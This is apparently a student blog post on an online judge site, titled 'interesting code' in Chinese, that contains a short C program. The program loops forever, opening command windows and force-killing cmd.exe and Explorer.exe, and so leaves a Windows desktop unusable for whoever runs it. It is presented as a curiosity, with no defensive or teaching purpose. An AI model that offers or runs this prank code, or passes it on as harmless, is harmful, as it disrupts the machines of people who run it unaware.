- C20250018's blog
有趣代码
- 2023-2-20 9:38:57 @
#include<stdio.h>
#include<stdlib.h>
int main(){
while(1)
{
system("start cmd.exe");
system("taskkill/f/im cmd.exe");
system("taskkill/f/im Explorer.exe");
}
return 0;
}
By signing up a HFOJ universal account, you can submit code and join discussions in all online judging services provided by us.